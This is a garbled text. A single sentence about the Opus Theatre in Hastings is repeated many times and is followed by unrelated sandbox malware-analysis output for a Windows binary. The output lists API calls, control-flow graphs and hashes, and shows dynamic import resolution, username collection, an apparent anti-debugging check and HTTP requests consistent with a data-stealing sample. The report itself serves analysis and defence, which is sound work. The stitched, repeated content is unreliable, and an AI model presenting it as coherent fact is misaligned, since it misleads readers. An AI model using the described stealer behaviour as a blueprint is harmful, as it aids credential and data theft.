Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                  • API String ID: 2127927946-2218711628
                                                  • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                  • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                                  • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                  • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocNameProcessUser
                                                  • String ID:
                                                  • API String ID: 1206570057-0
                                                  • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                  • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                                  • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                  • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                                  APIs
                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                  • ExitProcess.KERNEL32 ref: 0040117E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitInfoProcessSystem
                                                  • String ID:
                                                  • API String ID: 752954902-0
                                                  • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                  • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                                  • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                  • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                                  Control-flow Graph

                                                  control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                                  APIs
                                                  • GetProcAddress.KERNEL32(75900000,02D123A0), ref: 00419C2D
                                                  • GetProcAddress.KERNEL32(75900000,02D125C0), ref: 00419C45
                                                  • GetProcAddress.KERNEL32(75900000,02D45E78), ref: 00419C5E
                                                  • GetProcAddress.KERNEL32(75900000,02D45E90), ref: 00419C76
                                                  • GetProcAddress.KERNEL32(75900000,02D45F08), ref: 00419C8E
                                                  • GetProcAddress.KERNEL32(75900000,02D45F98), ref: 00419CA7
                                                  • GetProcAddress.KERNEL32(75900000,02D15B38), ref: 00419CBF
                                                  • GetProcAddress.KERNEL32(75900000,02D45FC8), ref: 00419CD7
                                                  • GetProcAddress.KERNEL32(75900000,02D46088), ref: 00419CF0
                                                  • GetProcAddress.KERNEL32(75900000,02D460B8), ref: 00419D08
                                                  • GetProcAddress.KERNEL32(75900000,02D460D0), ref: 00419D20
                                                  • GetProcAddress.KERNEL32(75900000,02D123E0), ref: 00419D39
                                                  • GetProcAddress.KERNEL32(75900000,02D12420), ref: 00419D51
                                                  • GetProcAddress.KERNEL32(75900000,02D12400), ref: 00419D69
                                                  • GetProcAddress.KERNEL32(75900000,02D124A0), ref: 00419D82
                                                  • GetProcAddress.KERNEL32(75900000,02D46058), ref: 00419D9A
                                                  • GetProcAddress.KERNEL32(75900000,02D46118), ref: 00419DB2
                                                  • GetProcAddress.KERNEL32(75900000,02D15890), ref: 00419DCB
                                                  • GetProcAddress.KERNEL32(75900000,02D12440), ref: 00419DE3
                                                  • GetProcAddress.KERNEL32(75900000,02D46100), ref: 00419DFB
                                                  • GetProcAddress.KERNEL32(75900000,02D460E8), ref: 00419E14
                                                  • GetProcAddress.KERNEL32(75900000,02D46070), ref: 00419E2C
                                                  • GetProcAddress.KERNEL32(75900000,02D460A0), ref: 00419E44
                                                  • GetProcAddress.KERNEL32(75900000,02D12620), ref: 00419E5D
                                                  • GetProcAddress.KERNEL32(75900000,02D48A98), ref: 00419E75
                                                  • GetProcAddress.KERNEL32(75900000,02D48C90), ref: 00419E8D
                                                  • GetProcAddress.KERNEL32(75900000,02D48AB0), ref: 00419EA6
                                                  • GetProcAddress.KERNEL32(75900000,02D48CF0), ref: 00419EBE
                                                  • GetProcAddress.KERNEL32(75900000,02D48D50), ref: 00419ED6
                                                  • GetProcAddress.KERNEL32(75900000,02D48D08), ref: 00419EEF
                                                  • GetProcAddress.KERNEL32(75900000,02D48D20), ref: 00419F07
                                                  • GetProcAddress.KERNEL32(75900000,02D48CA8), ref: 00419F1F
                                                  • GetProcAddress.KERNEL32(75900000,02D48AF8), ref: 00419F38
                                                  • GetProcAddress.KERNEL32(75900000,02D14C88), ref: 00419F50
                                                  • GetProcAddress.KERNEL32(75900000,02D48B70), ref: 00419F68
                                                  • GetProcAddress.KERNEL32(75900000,02D48AC8), ref: 00419F81
                                                  • GetProcAddress.KERNEL32(75900000,02D12580), ref: 00419F99
                                                  • GetProcAddress.KERNEL32(75900000,02D48D38), ref: 00419FB1
                                                  • GetProcAddress.KERNEL32(75900000,02D12500), ref: 00419FCA
                                                  • GetProcAddress.KERNEL32(75900000,02D48D68), ref: 00419FE2
                                                  • GetProcAddress.KERNEL32(75900000,02D48A80), ref: 00419FFA
                                                  • GetProcAddress.KERNEL32(75900000,02D125A0), ref: 0041A013
                                                  • GetProcAddress.KERNEL32(75900000,02D125E0), ref: 0041A02B
                                                  • LoadLibraryA.KERNEL32(02D48B58,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                                  • LoadLibraryA.KERNEL32(02D48C18,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                                  • LoadLibraryA.KERNEL32(02D48AE0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                                  • LoadLibraryA.KERNEL32(02D48B10,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                                  • LoadLibraryA.KERNEL32(02D48B28,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                                  • LoadLibraryA.KERNEL32(02D48B40,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                                  • LoadLibraryA.KERNEL32(02D48BA0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                                  • LoadLibraryA.KERNEL32(02D48C30,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                                  • GetProcAddress.KERNEL32(75FD0000,02D12600), ref: 0041A0DA
                                                  • GetProcAddress.KERNEL32(75FD0000,02D48B88), ref: 0041A0F2
                                                  • GetProcAddress.KERNEL32(75FD0000,02D45D10), ref: 0041A10A
                                                  • GetProcAddress.KERNEL32(75FD0000,02D48BB8), ref: 0041A123
                                                  • GetProcAddress.KERNEL32(75FD0000,02D12680), ref: 0041A13B
                                                  • GetProcAddress.KERNEL32(734B0000,02D15B60), ref: 0041A160
                                                  • GetProcAddress.KERNEL32(734B0000,02D127E0), ref: 0041A179
                                                  • GetProcAddress.KERNEL32(734B0000,02D15CC8), ref: 0041A191
                                                  • GetProcAddress.KERNEL32(734B0000,02D48C48), ref: 0041A1A9
                                                  • GetProcAddress.KERNEL32(734B0000,02D48BD0), ref: 0041A1C2
                                                  • GetProcAddress.KERNEL32(734B0000,02D126E0), ref: 0041A1DA
                                                  • GetProcAddress.KERNEL32(734B0000,02D129C0), ref: 0041A1F2
                                                  • GetProcAddress.KERNEL32(734B0000,02D48BE8), ref: 0041A20B
                                                  • GetProcAddress.KERNEL32(763B0000,02D12880), ref: 0041A22C
                                                  • GetProcAddress.KERNEL32(763B0000,02D12940), ref: 0041A244
                                                  • GetProcAddress.KERNEL32(763B0000,02D48C00), ref: 0041A25D
                                                  • GetProcAddress.KERNEL32(763B0000,02D48C60), ref: 0041A275
                                                  • GetProcAddress.KERNEL32(763B0000,02D12800), ref: 0041A28D
                                                  • GetProcAddress.KERNEL32(750F0000,02D15B88), ref: 0041A2B3
                                                  • GetProcAddress.KERNEL32(750F0000,02D159A8), ref: 0041A2CB
                                                  • GetProcAddress.KERNEL32(750F0000,02D48C78), ref: 0041A2E3
                                                  • GetProcAddress.KERNEL32(750F0000,02D12820), ref: 0041A2FC
                                                  • GetProcAddress.KERNEL32(750F0000,02D12780), ref: 0041A314
                                                  • GetProcAddress.KERNEL32(750F0000,02D159D0), ref: 0041A32C
                                                  • GetProcAddress.KERNEL32(75A50000,02D48CC0), ref: 0041A352
                                                  • GetProcAddress.KERNEL32(75A50000,02D12920), ref: 0041A36A
                                                  • GetProcAddress.KERNEL32(75A50000,02D45BD0), ref: 0041A382
                                                  • GetProcAddress.KERNEL32(75A50000,02D48CD8), ref: 0041A39B
                                                  • GetProcAddress.KERNEL32(75A50000,02D48E40), ref: 0041A3B3
                                                  • GetProcAddress.KERNEL32(75A50000,02D12900), ref: 0041A3CB
                                                  • GetProcAddress.KERNEL32(75A50000,02D12840), ref: 0041A3E4
                                                  • GetProcAddress.KERNEL32(75A50000,02D48D80), ref: 0041A3FC
                                                  • GetProcAddress.KERNEL32(75A50000,02D48D98), ref: 0041A414
                                                  • GetProcAddress.KERNEL32(75070000,02D129A0), ref: 0041A436
                                                  • GetProcAddress.KERNEL32(75070000,02D48DB0), ref: 0041A44E
                                                  • GetProcAddress.KERNEL32(75070000,02D48DC8), ref: 0041A466
                                                  • GetProcAddress.KERNEL32(75070000,02D48E10), ref: 0041A47F
                                                  • GetProcAddress.KERNEL32(75070000,02D48E28), ref: 0041A497
                                                  • GetProcAddress.KERNEL32(74E50000,02D12860), ref: 0041A4B8
                                                  • GetProcAddress.KERNEL32(74E50000,02D12700), ref: 0041A4D1
                                                  • GetProcAddress.KERNEL32(75320000,02D128C0), ref: 0041A4F2
                                                  • GetProcAddress.KERNEL32(75320000,02D48DE0), ref: 0041A50A
                                                  • GetProcAddress.KERNEL32(6F060000,02D128A0), ref: 0041A530
                                                  • GetProcAddress.KERNEL32(6F060000,02D12740), ref: 0041A548
                                                  • GetProcAddress.KERNEL32(6F060000,02D12960), ref: 0041A560
                                                  • GetProcAddress.KERNEL32(6F060000,02D48DF8), ref: 0041A579
                                                  • GetProcAddress.KERNEL32(6F060000,02D126A0), ref: 0041A591
                                                  • GetProcAddress.KERNEL32(6F060000,02D12760), ref: 0041A5A9
                                                  • GetProcAddress.KERNEL32(6F060000,02D12660), ref: 0041A5C2
                                                  • GetProcAddress.KERNEL32(6F060000,02D126C0), ref: 0041A5DA
                                                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0041A5F1
                                                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0041A607
                                                  • GetProcAddress.KERNEL32(74E00000,02D49050), ref: 0041A629
                                                  • GetProcAddress.KERNEL32(74E00000,02D45B90), ref: 0041A641
                                                  • GetProcAddress.KERNEL32(74E00000,02D48ED0), ref: 0041A659
                                                  • GetProcAddress.KERNEL32(74E00000,02D49068), ref: 0041A672
                                                  • GetProcAddress.KERNEL32(74DF0000,02D127C0), ref: 0041A693
                                                  • GetProcAddress.KERNEL32(6C3C0000,02D49080), ref: 0041A6B4
                                                  • GetProcAddress.KERNEL32(6C3C0000,02D12720), ref: 0041A6CD
                                                  • GetProcAddress.KERNEL32(6C3C0000,02D48EE8), ref: 0041A6E5
                                                  • GetProcAddress.KERNEL32(6C3C0000,02D49110), ref: 0041A6FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad
                                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                                  • API String ID: 2238633743-1775429166
                                                  • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                  • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                                  • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                  • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                                  Control-flow Graph

                                                  control_flow_graph 665 419860-419874 call 419750 668 419a93-419af2 LoadLibraryA * 5 665->668 669 41987a-419a8e call 419780 GetProcAddress * 21 665->669 671 419af4-419b08 GetProcAddress 668->671 672 419b0d-419b14 668->672 669->668 671->672 674 419b46-419b4d 672->674 675 419b16-419b41 GetProcAddress * 2 672->675 676 419b68-419b6f 674->676 677 419b4f-419b63 GetProcAddress 674->677 675->674 678 419b71-419b84 GetProcAddress 676->678 679 419b89-419b90 676->679 677->676 678->679 680 419bc1-419bc2 679->680 681 419b92-419bbc GetProcAddress * 2 679->681 681->680
                                                  APIs
                                                  • GetProcAddress.KERNEL32(75900000,02D17E40), ref: 004198A1
                                                  • GetProcAddress.KERNEL32(75900000,02D17E28), ref: 004198BA
                                                  • GetProcAddress.KERNEL32(75900000,02D17EB8), ref: 004198D2
                                                  • GetProcAddress.KERNEL32(75900000,02D17E58), ref: 004198EA
                                                  • GetProcAddress.KERNEL32(75900000,02D17E70), ref: 00419903
                                                  • GetProcAddress.KERNEL32(75900000,02D45BF0), ref: 0041991B
                                                  • GetProcAddress.KERNEL32(75900000,02D12480), ref: 00419933
                                                  • GetProcAddress.KERNEL32(75900000,02D12300), ref: 0041994C
                                                  • GetProcAddress.KERNEL32(75900000,02D17E88), ref: 00419964
                                                  • GetProcAddress.KERNEL32(75900000,02D17EA0), ref: 0041997C
                                                  • GetProcAddress.KERNEL32(75900000,02D17ED0), ref: 00419995
                                                  • GetProcAddress.KERNEL32(75900000,02D17E10), ref: 004199AD
                                                  • GetProcAddress.KERNEL32(75900000,02D12320), ref: 004199C5
                                                  • GetProcAddress.KERNEL32(75900000,02D45FF8), ref: 004199DE
                                                  • GetProcAddress.KERNEL32(75900000,02D45EA8), ref: 004199F6
                                                  • GetProcAddress.KERNEL32(75900000,02D12460), ref: 00419A0E
                                                  • GetProcAddress.KERNEL32(75900000,02D45E18), ref: 00419A27
                                                  • GetProcAddress.KERNEL32(75900000,02D45E30), ref: 00419A3F
                                                  • GetProcAddress.KERNEL32(75900000,02D12360), ref: 00419A57
                                                  • GetProcAddress.KERNEL32(75900000,02D45E48), ref: 00419A70
                                                  • GetProcAddress.KERNEL32(75900000,02D12380), ref: 00419A88
                                                  • LoadLibraryA.KERNEL32(02D46028,?,00416A00), ref: 00419A9A
                                                  • LoadLibraryA.KERNEL32(02D45D88,?,00416A00), ref: 00419AAB
                                                  • LoadLibraryA.KERNEL32(02D45F20,?,00416A00), ref: 00419ABD
                                                  • LoadLibraryA.KERNEL32(02D46010,?,00416A00), ref: 00419ACF
                                                  • LoadLibraryA.KERNEL32(02D45EC0,?,00416A00), ref: 00419AE0
                                                  • GetProcAddress.KERNEL32(75070000,02D46040), ref: 00419B02
                                                  • GetProcAddress.KERNEL32(75FD0000,02D45DA0), ref: 00419B23
                                                  • GetProcAddress.KERNEL32(75FD0000,02D45F38), ref: 00419B3B
                                                  • GetProcAddress.KERNEL32(75A50000,02D45D58), ref: 00419B5D
                                                  • GetProcAddress.KERNEL32(74E50000,02D124C0), ref: 00419B7E
                                                  • GetProcAddress.KERNEL32(76E80000,02D45CA0), ref: 00419B9F
                                                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419BB6
                                                  Strings
                                                  • NtQueryInformationProcess, xrefs: 00419BAA
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad
                                                  • String ID: NtQueryInformationProcess
                                                  • API String ID: 2238633743-2781105232
                                                  • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                  • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                                  • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                  • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                                  Control-flow Graph

                                                  control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                                  • StrCmpCA.SHLWAPI(?,02D4AE30), ref: 0040493A
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                                  • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,02D4AEA0), ref: 00404DE8
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                                  • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                                  • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                                  • HttpOpenRequestA.WININET(00000000,02D4AF90,?,02D4A0C8,00000000,00000000,00400100,00000000), ref: 00404B15
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                  • String ID: "$"$------$------$------
                                                  • API String ID: 2402878923-2180234286
                                                  • Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                  • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                                  • Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                  • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A

                                                  Control-flow Graph (rendered graph not reproduced in text)
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                  • StrCmpCA.SHLWAPI(?,02D4AE30), ref: 00406303
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
